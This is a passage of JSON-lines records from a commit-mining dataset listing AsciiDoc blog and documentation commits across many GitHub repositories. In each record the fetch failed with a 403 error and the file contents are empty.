designs\n","repos":"markllama\/hexgame,markllama\/hexgame","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/hexgame.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f71c9fa2889fd0bbdcf120f5694fd480f58a016b","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0051caad83142b2578f1d2745ff05d6d119c45bd","subject":"Update 2016-08-26-Java-EE-7-Training-resources.adoc","message":"Update 2016-08-26-Java-EE-7-Training-resources.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2016-08-26-Java-EE-7-Training-resources.adoc","new_file":"_posts\/2016-08-26-Java-EE-7-Training-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04cd4a4116fa58d4ce49d7f75d05a82514c6d900","subject":"Renamed '_posts\/2017-10-15-First-tip-find-your-HOME.adoc' to '_posts\/2017-10-15-Find-your-HOME.adoc'","message":"Renamed '_posts\/2017-10-15-First-tip-find-your-HOME.adoc' to '_posts\/2017-10-15-Find-your-HOME.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-15-Find-your-HOME.adoc","new_file":"_posts\/2017-10-15-Find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"519050f4d3333f479c367d0036b2f350d448ee12","subject":"y2b create post 11.1 SURROUND!? (Superunknown Super Deluxe Edition)","message":"y2b create post 11.1 SURROUND!? (Superunknown Super Deluxe Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-03-111-SURROUND-Superunknown-Super-Deluxe-Edition.adoc","new_file":"_posts\/2014-06-03-111-SURROUND-Superunknown-Super-Deluxe-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"377c0c02aea3eb5274ea0f1609477be680437f69","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d326bc0e084840311415b63962eda502a12a13bb","subject":"Deleted 2016-6-27-file-getput-content.adoc","message":"Deleted 2016-6-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-file-getput-content.adoc","new_file":"2016-6-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd31926ba87fb5f77971cb54d8b0cdf22f117be6","subject":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","message":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4daed2ba6741a3bd54951007935164141c81e4c","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/25\/deref.adoc","new_file":"content\/news\/2021\/06\/25\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fc3b8b7b5ffdca4d44e0310c230cd68f4efdbad5","subject":"Section 1 of documentation complete.","message":"Section 1 of documentation complete.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/what_is_recordtrac.adoc","new_file":"docs\/what_is_recordtrac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59aea01fa0d013112741ae8b973c587dc4e41268","subject":"Changelog added","message":"Changelog added\n","repos":"asciidoctor\/brackets-asciidoc-preview,nixionx\/brackets-asciidoc-preview,nixionx\/brackets-asciidoc-preview","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nixionx\/brackets-asciidoc-preview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0709d62b93ecb3ad92dc29deceb1f00af665197","subject":"Update 2014-05-31-Use-Drush.adoc","message":"Update 2014-05-31-Use-Drush.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-31-Use-Drush.adoc","new_file":"_posts\/2014-05-31-Use-Drush.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"396db68dad20823a04a044feae63bc55f419f6c7","subject":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","message":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47b7d138f42124307f46f9ccb37309f2bb3593bf","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_best_game.adoc","new_file":"content\/writings\/the_best_game.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5ddb46f4148500535d6ccfda6305012a497eeff2","subject":"Update 2015-09-24-AS-kjj.adoc","message":"Update 2015-09-24-AS-kjj.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-24-AS-kjj.adoc","new_file":"_posts\/2015-09-24-AS-kjj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baa938a702ce5a2a9015a8be832730b626d29fac","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115b013750cb7af93fe514d8c24cf9fcb67d3ada","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b96f3e2dab5527cfee6f12aed5e3efed53da279","subject":"README: Adding README.asciidoc","message":"README: Adding README.asciidoc\n\nAdding a README.asciidoc as github renders the\n.asciidoc files. README.asciidoc is a soft link\nto original 0.Readme.txt.\n\nSigned-off-by: Lalatendu Mohanty <51e26f8eb794e7391b5ea8128d9ade5c4c5ae20b@redhat.com>\n","repos":"ubiqx-org\/Carnaval,manuella\/Carnaval","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ubiqx-org\/Carnaval.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5a6caebf42eb367f7e4a3d983623591a6a298c0a","subject":"Update 2017-01-28-Markov.adoc","message":"Update 2017-01-28-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Markov.adoc","new_file":"_posts\/2017-01-28-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc2151b91bfe8cd2674c20e992bfe0a59072b3f","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fede11904044639f18e66686afe31a1d482ce02d","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb87bf97ebb53735ae6bbd531fc7ad9efe9724fe","subject":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","message":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7906744ef4d42ece914ffeb0b9631cb6237df340","subject":"y2b create post I've Never Tried Anything Like It...","message":"y2b create post I've Never Tried Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-14-IveNeverTriedAnythingLikeIt.adoc","new_file":"_posts\/2018-02-14-IveNeverTriedAnythingLikeIt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2afceab284f9e903c5873fd296dc160c27173b59","subject":"Renamed '_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc' to '_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc'","message":"Renamed '_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc' to '_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc'","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0d34f4cc25d9c6afc95274964020116c8aa6c72","subject":"Update 2015-07-11-Fabric8-Developer-cheat-sheet.adoc","message":"Update 2015-07-11-Fabric8-Developer-cheat-sheet.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-11-Fabric8-Developer-cheat-sheet.adoc","new_file":"_posts\/2015-07-11-Fabric8-Developer-cheat-sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94cf6c618654e361b94b9ea40f4676bc6f74fccf","subject":"Update 2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc","message":"Update 2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc","new_file":"_posts\/2019-10-01-How-to-Make-Tools-in-Unreal-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf7169875e529859ded1b3777e705371d23af7fd","subject":"Update 2017-01-24-Episode-85-If-you-dont-have-anything-nice-to-say.adoc","message":"Update 2017-01-24-Episode-85-If-you-dont-have-anything-nice-to-say.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-01-24-Episode-85-If-you-dont-have-anything-nice-to-say.adoc","new_file":"_posts\/2017-01-24-Episode-85-If-you-dont-have-anything-nice-to-say.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e528c65f95e5b582e0f08ecc2790a1d7e7062df6","subject":"Update 2015-10-30-.adoc","message":"Update 2015-10-30-.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-10-30-.adoc","new_file":"_posts\/2015-10-30-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f08b998774dd12ac63ff0baa77121b22de58956","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a4b35637f37e7b9f91e47b7e7911c1acc4fb37d","subject":"Update 2016-02-08-Deploy-on-AWS.adoc","message":"Update 2016-02-08-Deploy-on-AWS.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2016-02-08-Deploy-on-AWS.adoc","new_file":"_posts\/2016-02-08-Deploy-on-AWS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71580205850147c7de5f71160f7610de6a80b090","subject":"Update 2018-08-20-UCF-TDI-Setup.adoc","message":"Update 2018-08-20-UCF-TDI-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-20-UCF-TDI-Setup.adoc","new_file":"_posts\/2018-08-20-UCF-TDI-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3a8fb431494f6768da00d6345a93113fcc105ee","subject":"add getting-started-openshift-s2i (fixes #1306)","message":"add getting-started-openshift-s2i (fixes #1306)\n\nhttps:\/\/github.com\/quarkusio\/quarkus\/issues\/1306\n\nsee also https:\/\/github.com\/quarkusio\/quarkus\/issues\/1305\n\nrequires https:\/\/github.com\/quarkusio\/quarkus-quickstarts\/pull\/81\n\nand then to actually publish the link to this new guide in the menu\nit needs https:\/\/github.com\/quarkusio\/quarkusio.github.io\/pull\/126\/\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/openshift-s2i-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/openshift-s2i-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7023ef2e3ff6d749caf67d7a5c2f47b374acdb2b","subject":"[DOCS] Added a basic information about the official Ruby client to documentation","message":"[DOCS] Added a basic information about the official Ruby client to documentation\n","repos":"chrismwendt\/elasticsearch,fekaputra\/elasticsearch,sposam\/elasticsearch,petabytedata\/elasticsearch,golubev\/elasticsearch,alexkuk\/elasticsearch,mkis-\/elasticsearch,EasonYi\/elasticsearch,palecur\/elasticsearch,ydsakyclguozi\/elasticsearch,camilojd\/elasticsearch,luiseduardohdbackup\/elasticsearch,martinstuga\/elasticsearch,kubum\/elasticsearch,kevinkluge\/elasticsearch,gingerwizard\/elasticsearch,hydro2k\/elasticsearch,skearns64\/elasticsearch,overcome\/elasticsearch,myelin\/elasticsearch,combinatorist\/elasticsearch,Chhunlong\/elasticsearch,tahaemin\/elasticsearch,strapdata\/elassandra-test,Flipkart\/elasticsearch,caengcjd\/elasticsearch,andrestc\/elasticsearch,jpountz\/elasticsearch,pranavraman\/elasticsearch,kevinkluge\/elasticsearch,jpountz\/elasticsearch,fernandozhu\/elasticsearch,ivansun1010\/elasticsearch,i-am-Nathan\/elasticsearch,dataduke\/elasticsearch,winstonewert\/elasticsearch,henakamaMSFT\/elasticsearch,Chhunlong\/elasticsearch,iamjakob\/elasticsearch,masterweb121\/elasticsearch,nazarewk\/elasticsearch,javachengwc\/elasticsearch,coding0011\/elasticsearch,andrejserafim\/elasticsearch,geidies\/elasticsearch,andrewvc\/elasticsearch,nellicus\/elasticsearch,janmejay\/elasticsearch,onegambler\/elasticsearch,liweinan0423\/elasticsearch,Rygbee\/elasticsearch,strapdata\/elassandra-test,PhaedrusTheGreek\/elasticsearch,golubev\/elasticsearch,AshishThakur\/elasticsearch,Widen\/elasticsearch,huanzhong\/elasticsearch,diendt\/elasticsearch,iamjakob\/elasticsearch,kaneshin\/elasticsearch,mortonsykes\/elasticsearch,kalburgimanjunath\/elasticsearch,Liziyao\/elasticsearch,markwalkom\/elasticsearch,aparo\/elasticsearch,rajanm\/elasticsearch,lchennup\/elasticsearch,rlugojr\/elasticsearch,ulkas\/elasticsearch,dantuffery\/elasticsearch,kimimj\/elasticsearch,wimvds\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,Shepard1212\/elasticsearch,lydonchandra\/elasticsearch,feiqitian\/elasticsearch,artnowo\/elasticsearch,codebunt\/elasticsearch,kkirsche\/elasticsearch,kubum\/elasticsearch,luiseduardohdbackup\/elasticsearch,maddin2016\/elasticsearch,xuzha\/elasticsearch,mortonsykes\/elasticsearch,yongminxia\/elasticsearch,ydsakyclguozi\/elasticsearch,mrorii\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,ImpressTV\/elasticsearch,libosu\/elasticsearch,schonfeld\/elasticsearch,truemped\/elasticsearch,uschindler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,hydro2k\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,micpalmia\/elasticsearch,amaliujia\/elasticsearch,obourgain\/elasticsearch,dantuffery\/elasticsearch,yuy168\/elasticsearch,avikurapati\/elasticsearch,pranavraman\/elasticsearch,Shekharrajak\/elasticsearch,Liziyao\/elasticsearch,shreejay\/elasticsearch,Liziyao\/elasticsearch,JackyMai\/elasticsearch,khiraiwa\/elasticsearch,jango2015\/elasticsearch,queirozfcom\/elasticsearch,kimimj\/elasticsearch,hafkensite\/elasticsearch,yongminxia\/elasticsearch,sjohnr\/elasticsearch,infusionsoft\/elasticsearch,dylan8902\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,18098924759\/elasticsearch,overcome\/elasticsearch,girirajsharma\/elasticsearch,amaliujia\/elasticsearch,codebunt\/elasticsearch,martinstuga\/elasticsearch,marcuswr\/elasticsearch-dateline,AshishThakur\/elasticsearch,slavau\/elasticsearch,sposam\/elasticsearch,MisterAndersen\/elasticsearch,xpandan\/elasticsearch,Fsero\/elasticsearch,spiegela\/elasticsearch,NBSW\/elasticsearch,C-Bish\/elasticsearch,sauravmondallive\/elasticsearch,vingupta3\/elasticsearch,himanshuag\/elasticsearch,beiske\/elasticsearch,ivansun1010\/elasticsearch,chrismwendt\/elasticsearch,kimchy\/elasticsearch,micpalmia\/elasticsearch,uboness\/elasticsearch,bestwpw\/elasticsearch,Clairebi\/ElasticsearchClone,sjohnr\/elasticsearch,jprante\/elasticsearch,fforbeck\/elasticsearch,combinatorist\/elasticsearch,kimimj\/elasticsearch,JackyMai\/elasticsearch,jeteve\/elasticsearch,wangtuo\/elasticsearch,markharwood\/elasticsearch,HonzaKral\/elasticsearch,avikurapati\/elasticsearch,vietlq\/elasticsearch,lightslife\/elasticsearch,vingupta3\/elasticsearch,Uiho\/elasticsearch,martinstuga\/elasticsearch,iantruslove\/elasticsearch,nrkkalyan\/elasticsearch,Widen\/elasticsearch,socialrank\/elasticsearch,szroland\/elasticsearch,xuzha\/elasticsearch,janmejay\/elasticsearch,LewayneNaidoo\/elasticsearch,Siddartha07\/elasticsearch,rento19962\/elasticsearch,dongjoon-hyun\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,luiseduardohdbackup\/elasticsearch,brwe\/elasticsearch,kubum\/elasticsearch,awislowski\/elasticsearch,tsohil\/elasticsearch,nellicus\/elasticsearch,AshishThakur\/elasticsearch,Siddartha07\/elasticsearch,jango2015\/elasticsearch,jeteve\/elasticsearch,LeoYao\/elasticsearch,mmaracic\/elasticsearch,Helen-Zhao\/elasticsearch,jpountz\/elasticsearch,phani546\/elasticsearch,masterweb121\/elasticsearch,btiernay\/elasticsearch,nomoa\/elasticsearch,Microsoft\/elasticsearch,jsgao0\/elasticsearch,girirajsharma\/elasticsearch,andrestc\/elasticsearch,kenshin233\/elasticsearch,ESamir\/elasticsearch,smflorentino\/elasticsearch,ImpressTV\/elasticsearch,mnylen\/elasticsearch,TonyChai24\/ESSource,nrkkalyan\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mjhennig\/elasticsearch,Uiho\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,micpalmia\/elasticsearch,skearns64\/elasticsearch,ouyangkongtong\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,thecocce\/elasticsearch,andrestc\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,kcompher\/elasticsearch,petmit\/elasticsearch,nellicus\/elasticsearch,tkssharma\/elasticsearch,JackyMai\/elasticsearch,kimchy\/elasticsearch,StefanGor\/elasticsearch,dylan8902\/elasticsearch,apepper\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,andrewvc\/elasticsearch,MjAbuz\/elasticsearch,mjason3\/elasticsearch,elancom\/elasticsearch,adrianbk\/elasticsearch,luiseduardohdbackup\/elasticsearch,pozhidaevak\/elasticsearch,alexkuk\/elasticsearch,markllama\/elasticsearch,hirdesh2008\/elasticsearch,truemped\/elasticsearch,franklanganke\/elasticsearch,zeroctu\/elasticsearch,AleksKochev\/elasticsearch,trangvh\/elasticsearch,tahaemin\/elasticsearch,wbowling\/elasticsearch,vroyer\/elasticassandra,xingguang2013\/elasticsearch,brwe\/elasticsearch,anti-social\/elasticsearch,pranavraman\/elasticsearch,myelin\/elasticsearch,boliza\/elasticsearch,wangtuo\/elasticsearch,himanshuag\/elasticsearch,jeteve\/elasticsearch,fubuki\/elasticsearch,sc0ttkclark\/elasticsearch,markharwood\/elasticsearch,acchen97\/elasticsearch,episerver\/elasticsearch,wbowling\/elasticsearch,iamjakob\/elasticsearch,18098924759\/elasticsearch,VukDukic\/elasticsearch,dylan8902\/elasticsearch,pablocastro\/elasticsearch,scorpionvicky\/elasticsearch,episerver\/elasticsearch,C-Bish\/elasticsearch,mjhennig\/elasticsearch,jprante\/elasticsearch,polyfractal\/elasticsearch,ulkas\/elasticsearch,Liziyao\/elasticsearch,mnylen\/elasticsearch,socialrank\/elasticsearch,HarishAtGitHub\/elasticsearch,scorpionvicky\/elasticsearch,queirozfcom\/elasticsearch,MjAbuz\/elasticsearch,mute\/elasticsearch,xuzha\/elasticsearch,fubuki\/elasticsearch,KimTaehee\/elasticsearch,LeoYao\/elasticsearch,javachengwc\/elasticsearch,dantuffery\/elasticsearch,trangvh\/elasticsearch,Flipkart\/elasticsearch,easonC\/elasticsearch,coding0011\/elasticsearch,rlugojr\/elasticsearch,pranavraman\/elasticsearch,Liziyao\/elasticsearch,pablocastro\/elasticsearch,rento19962\/elasticsearch,mnylen\/elasticsearch,drewr\/elasticsearch,Widen\/elasticsearch,henakamaMSFT\/elasticsearch,aglne\/elasticsearch,acchen97\/elasticsearch,mgalushka\/elasticsearch,mjhennig\/elasticsearch,alexbrasetvik\/elasticsearch,alexkuk\/elasticsearch,mrorii\/elasticsearch,winstonewert\/elasticsearch,tkssharma\/el